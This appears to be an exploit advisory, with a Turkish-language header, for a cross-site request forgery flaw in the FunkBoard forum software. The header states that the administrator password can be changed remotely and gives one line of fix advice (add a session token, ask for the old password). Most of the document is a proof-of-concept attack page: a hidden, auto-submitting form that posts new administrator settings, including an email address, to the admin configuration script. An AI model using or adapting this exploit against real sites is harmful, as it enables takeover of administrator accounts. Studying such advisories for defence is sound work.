< ------------------- header data start ------------------- >

#############################################################

# Application Name : FunkBoard

# Vulnerable Type : Cross Site Request Forgery

# Infection : Uzaktan admin sifresi degistirilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : CW Bug Researchers/Butterfly Effect

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.Bug.submit();}</script>

<form action=http://www.site.com/Patch/admin/adminconfig.php method=POST name=Bug>
<input type=hidden size=60 name=real_name value=bug>
<input type=hidden size=60 name=name value=bug>
<input type=hidden size=60 name=thing value=bug>
<input type=hidden size=60 name=admail value=[email protected]>
<input type=hidden name=x[] value=a>
<input type=hidden name=x[] value=b>
<input type=hidden name=x[] value=c>
<input type=hidden name=x[] value=d>
<input type=hidden name=x[] value=f>
<input type=hidden name=x[] value=g>
<input type=hidden name=x[] value=h>
<input type=hidden name=x[] value=i>
<input type=hidden name=x[] value=j>
<input type=hidden name=x[] value=k>
<input type=hidden name=x[] value=l>
<input type=hidden name=x[] value=m>
<input type=hidden name=x[] value=n>
<input type=hidden name=x[] value=o>
<input type=hidden name=action value=newinput>
<input type=hidden name=uid value=>
<input type=submit value=create name=B1>


< -- bug code end of -- >